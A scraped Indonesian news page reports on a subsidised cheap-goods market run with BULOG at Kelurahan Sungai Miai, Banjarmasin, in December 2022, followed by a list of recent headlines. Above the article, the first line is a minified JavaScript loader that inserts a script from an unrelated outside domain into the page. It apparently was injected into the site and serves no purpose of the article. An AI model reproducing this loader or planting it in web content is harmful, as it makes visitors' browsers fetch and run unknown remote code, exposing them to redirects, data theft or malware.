(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Warga Kelurahan Sungai Miai Banjarmasin Nikmati Pasar Murah


KANALKALIMANTAN.COM, BANJARMASIN – Melambungnya harga bahan-bahan pokok menjelang perayaan Natal dan tahun baru 2023 mulai dirasakan. Sejumlah bahan pokok seperti gula, minyak hingga beras perlahan mulai menaik sehingga banyak masyarakat dan pemerintah ambil sikap dalam menyiasati keadaan ini.

Seperti yang terlihat di kantor Kelurahan Sungai Miai, Kecamatan Banjarmasin Utara, Kota Banjarmasin pada Selasa (13/12/2022) siang, kegiatan Pasar Murah diadakan. Pasar Murah kali ini diadakan Kelurahan Sungai Miai bekerjasama dengan Badan Usaha Logistik (BULOG) Kota Banjarmasin.

Lurah Sungai Miai, Gusti Ikromi Akbar menyebutkan sedikitnya ada 100 sak beras, 180 liter minyak goreng dan 200 kilogram dijual dengan harga di bawah harga pasaran.

“Alhamdulillah kita kedatangan dari BULOG melaksnakan pasar murah dalam rangka menjaga inflasi bahan pokok yang terjadi saat menjelang Natal dan Tahun Baru 2023 ini,” kata Lurah Sungai Miai, Gusti Ikromi Akbar saat diwawancarai media, Selasa (13/12/2022).

 

Baca juga  : Pj Bupati HSU Harap Ada Inovasi Baru untuk Kemajuan Gerakan Pramuka

Dengan tujuan utama untuk menjaga harga pasar, adapun pembeli tidak terkhusus ditargetkan untuk warga miskin saja. Diharapkan seluruh warga dapat terbantu dalam memenuhi kebutuhannya.

“Di mana warga di sini kebanyakan ialah pegiat usaha yang notabenenya berdagang minuman dan makanan sehingga alangkah baiknya kegiatan ini rutin dilaksanakan, agar pemenuhan kebutuhan sehari-hari maupun kebutuhan akan modal berdagang dapat tercukupi,” jelasnya.

Meskipun hujan, warga silih berganti berdatangan ke kawasan pasar murah yang terletak di kantor Kelurahan Sungai Miai Banjarmasin. Warga merupakan gabungan beberapa RT yang berada di kelurahan setempat.

“Tentu pasar murah ini sangat membantu disaat harga harga bahan pokok melambung, karena ini sudah yang ketika kalinya diselenggarakan dan warga selau antusias untuk datang ke lokasi pasar murah,” ucap Marhadi salah seorang warga RT 23 Kelurahan Sungai Miai.

Baca juga  : Kendalikan Inflasi, Pemkab Balangan Salurkan Ratusan Bantuan Voucher BBM ke Ojek

Dirinya berharap kegiatan pasar murah ini dapat rutin dilaksanakan dengan harga yang tentunya lebih terjangkau lagi.

“Harapannya kalau bisa lebih sering diadakan lalu kalau bisa harganya lebih ditekan lagi karena kemaren ada vocher Rp 20 ribu,” pungkasnya.

Diketahui Kelurahan Sungai Miai tengah menyelenggarakan berbagai kegiatan dalam rangka menyambut HUT Kelurahan Sungai Miai.

Adapun tanggal 18 Desember mendatang warga bersama-sama akan melaksanakan kegiatan Jalan Sehat dengan berhadiah doorprize. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : cell


Desy Arfianty

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

6 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

8 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

8 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

9 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

13 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

16 jam ago

This website uses cookies.